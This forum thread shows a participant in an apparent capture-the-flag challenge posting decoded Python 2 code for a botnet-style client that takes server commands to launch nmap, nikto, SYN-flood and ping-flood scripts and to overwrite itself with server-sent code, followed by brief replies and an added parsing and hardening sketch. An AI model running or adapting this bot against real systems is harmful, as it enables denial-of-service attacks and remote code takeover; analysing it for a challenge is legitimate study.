Thread: Cyber challenge

    #1
    Registered User, Devshed Newbie (0 - 499 posts)
    Join Date: Dec 2013 | Posts: 3 | Rep Power: 0

    Cyber challenge


    Hi,
    I'm completely new to Python (but have some experience with other programming languages)...

    I'm in the middle of a cyber challenge, and have decoded a script which might have a vulnerability...

    Can someone help me out in the right direction? I'm totally lost


    Code:
    # Twisted-based bot client as decoded; Python 2 (print statements, dict.has_key).
    from twisted.internet import reactor
    from twisted.internet.protocol import ReconnectingClientFactory
    from twisted.protocols.basic import LineReceiver
    import os
    import re
    import random
    import sys
    import subprocess
    from base64 import b64encode, b64decode

    class FirstNetClientProtocol(LineReceiver):
        delimiter = "\n"

        def __init__(self):
            self.version = 1.101
            self.state = "INIT"
            # Command table: a line "NAME? args" is a request, "NAME! args" a response.
            # Each entry gives the expected argument count and the handler for both.
            self.commands = {
                "DOWNLOAD": {
                    "request_args": 1,
                    "request_handler": None,
                    "response_args": 2,
                    "response_handler": self.handleDownloadResponse,
                },
                "NIKTO": {
                    "request_args": 2,
                    "request_handler": self.handleAttackRequest,
                    "response_args": 2,
                    "response_handler": None
                },
                "NMAP": {
                    "request_args": 2,
                    "request_handler": self.handleAttackRequest,
                    "response_args": 2,
                    "response_handler": None
                },
                "PING": {
                    "request_args": 1,
                    "request_handler": self.handlePingRequest,
                    "response_args": 1,
                    "response_handler": None
                },
                "PINGFLOOD": {
                    "request_args": 3,
                    "request_handler": self.handleAttackRequest,
                    "response_args": 2,
                    "response_handler": None
                },
                "SYNFLOOD": {
                    "request_args": 3,
                    "request_handler": self.handleAttackRequest,
                    "response_args": 2,
                    "response_handler": None
                },
                "VERSION": {
                    "request_args": 0,
                    "request_handler": None,
                    "response_args": 1,
                    "response_handler": self.handleVersionResponse,
                },
            }

        def lineReceived(self, line):
            print line
            words = line.split()

            # Handshake: the server's "FirstNet" banner moves the client into the
            # COMMAND state, and the client immediately asks for the server's version.
            if self.state == "INIT" and line == "FirstNet":
                print line
                self.sendLine("VERSION?")
                self.state = "COMMAND"
                return

            if len(words) <= 0:
                print ("Unknown command")
                return

            # The first word must be NAME? (request) or NAME! (response).
            matches = re.search(r"^(.+)([?!])$", words[0])
            if not matches:
                print ("Unknown command")
                return

            command = matches.group(1)
            if matches.group(2) == '?':
                command_type = 'REQUEST'
            else:
                command_type = 'RESPONSE'

            if not self.commands.has_key(command):
                print ("Unknown command")
                return

            # The argument count must match the table exactly; a handler of None
            # means the command is accepted but ignored.
            if command_type == 'REQUEST':
                request_args = self.commands[command]['request_args']
                request_handler = self.commands[command]['request_handler']
                if len(words) - 1 != request_args:
                    print ("Unknown command")
                    return

                if request_handler:
                    request_handler(command, *words[1:])
            else:
                response_args = self.commands[command]['response_args']
                response_handler = self.commands[command]['response_handler']
                if len(words) - 1 != response_args:
                    print ("Unknown command")
                    return

                if response_handler:
                    response_handler(command, *words[1:])

            print command, command_type

        def attack(self, ident, command, arg1, arg2, attack):
            # Runs one of the helper scripts (argument list, no shell) and reports
            # its output to the server base64-encoded.
            result = subprocess.check_output([command, arg1, str(arg2)])
            self.sendLine("{0}! {1} {2}".format(attack, ident, b64encode(result)))

        def handleAttackRequest(self, command, ident, ip, duration=0):
            # Arguments are only regex-checked: digits for ident and duration,
            # digits and dots for ip.
            if not re.match("^[0-9]+$", ident) or not re.match("^[0-9.]+$", ip) or \
                (duration and not re.match("^[0-9]+$", duration)):
                print ("Unknown command")
                return

            if command == "NIKTO":
                reactor.callInThread(self.attack, ident, "./nikto.sh", ip, 0, command)
            elif command == "NMAP":
                reactor.callInThread(self.attack, ident, "./nmap.sh", ip, 0, command)
            elif command == "SYNFLOOD":
                reactor.callInThread(self.attack, ident, "./synflood.sh", ip, duration, command)
            elif command == "PINGFLOOD":
                reactor.callInThread(self.attack, ident, "./pingflood.sh", ip, duration, command)
            else:
                print ("Unknown command")
                return

        def handleDownloadResponse(self, command, version, data):
            # Self-update: overwrite this client's own source with the decoded
            # payload the server sent, then stop the reactor.
            f = open("client.py", "w")
            f.write(b64decode(data))
            f.close()
            reactor.stop()

        def handlePingRequest(self, command, ident):
            # Echo the ping identifier back to the server.
            self.sendLine("PING! {0}".format(ident))

        def handleVersionResponse(self, command, version):
            # If the server reports a newer version, ask it for the new client.
            if float(version) > self.version:
                self.sendLine("DOWNLOAD? {0}".format(str(float(version))))


    class FirstNetClientProtocolFactory(ReconnectingClientFactory):
        def buildProtocol(self, addr):
            return FirstNetClientProtocol()


    reactor.connectTCP("192.168.123.1", 8123, FirstNetClientProtocolFactory())
    reactor.run()
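Added example (mine, not code from the thread): the command grammar from lineReceived() and the argument checks from handleAttackRequest() pulled out into plain functions, without Twisted, so you can see exactly which lines the posted client accepts. strict_attack_args_ok is a tighter variant I am suggesting (real IPv4 only, bounded duration); it is not part of the script, and the "FirstNet" banner handshake is not modelled.

```python
import re
import ipaddress

# Argument counts copied from the posted client's command table.
COMMANDS = {
    "DOWNLOAD":  {"request_args": 1, "response_args": 2},
    "NIKTO":     {"request_args": 2, "response_args": 2},
    "NMAP":      {"request_args": 2, "response_args": 2},
    "PING":      {"request_args": 1, "response_args": 1},
    "PINGFLOOD": {"request_args": 3, "response_args": 2},
    "SYNFLOOD":  {"request_args": 3, "response_args": 2},
    "VERSION":   {"request_args": 0, "response_args": 1},
}

LINE_RE = re.compile(r"^(.+)([?!])$")  # same first-word grammar as lineReceived()


def parse_line(line):
    """Return (command, kind, args) for a FirstNet line in the COMMAND state,
    or None wherever the posted client would print 'Unknown command'."""
    words = line.split()
    if not words:
        return None
    m = LINE_RE.match(words[0])
    if not m or m.group(1) not in COMMANDS:
        return None
    command = m.group(1)
    kind = "REQUEST" if m.group(2) == "?" else "RESPONSE"
    expected = COMMANDS[command]["request_args" if kind == "REQUEST" else "response_args"]
    args = words[1:]
    if len(args) != expected:
        return None
    return command, kind, args


def posted_attack_args_ok(ident, ip, duration=None):
    """The regex checks exactly as handleAttackRequest() applies them
    (duration is only checked when present, as with the default of 0)."""
    if not re.match("^[0-9]+$", ident) or not re.match("^[0-9.]+$", ip):
        return False
    return duration is None or re.match("^[0-9]+$", duration) is not None


def strict_attack_args_ok(ident, ip, duration="0", max_duration=60):
    """Suggested hardening (mine, not from the thread): a real IPv4 address,
    a bounded ident, and a duration capped at max_duration seconds."""
    if not re.fullmatch(r"[0-9]{1,9}", ident):
        return False
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:       # "1.2.3.4.5" or "..." pass the posted regex but fail here
        return False
    return bool(re.fullmatch(r"[0-9]{1,4}", duration)) and int(duration) <= max_duration
```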
    #2
    Contributing User, Devshed Demi-God (4500 - 4999 posts)
    Join Date: Aug 2011 | Posts: 4,996 | Rep Power: 481
    Can someone help me out in the right direction?
    Head North by Northwest.
    [code]Code tags[/code] are essential for python code and Makefiles!
    #3
    Registered User, Devshed Newbie (0 - 499 posts)
    Join Date: Dec 2013 | Posts: 3 | Rep Power: 0
    Why didn't I think of that LOL


    Originally Posted by b49P23TIvg
    Head North by Northwest.
    #4
    Registered User, Devshed Newbie (0 - 499 posts)
    Join Date: Dec 2013 | Posts: 2 | Rep Power: 0
    Where does this direction lead to? What exactly do you want to do?
    #5
    Registered User, Devshed Newbie (0 - 499 posts)
    Join Date: Dec 2013 | Posts: 3 | Rep Power: 0
    Well, I haven't got much info...
    But I connect to a server on port 8123 (bottom of script)

    I only can input:
    VERSION?
    or
    DOWNLOAD 1.101
    or
    PING?

    I suppose I have to execute one of the .sh scripts, where I possibly can exploit them by adding other code... but now I'm guessing...

    Originally Posted by hyp3rkyd
    Where does this direction lead to? What exactly do you want to do?
    #6
    Registered User, Devshed Newbie (0 - 499 posts)
    Join Date: Jan 2014 | Posts: 1 | Rep Power: 0
    Originally Posted by mudley
    Well, I haven't got much info...
    But I connect to a server on port 8123 (bottom of script)

    I only can input:
    VERSION?
    or
    DOWNLOAD 1.101
    or
    PING?

    I suppose I have to execute one of the .sh scripts, where I possibly can exploit them by adding other code... but now I'm guessing...
    and did you exceed???
    What did you do??
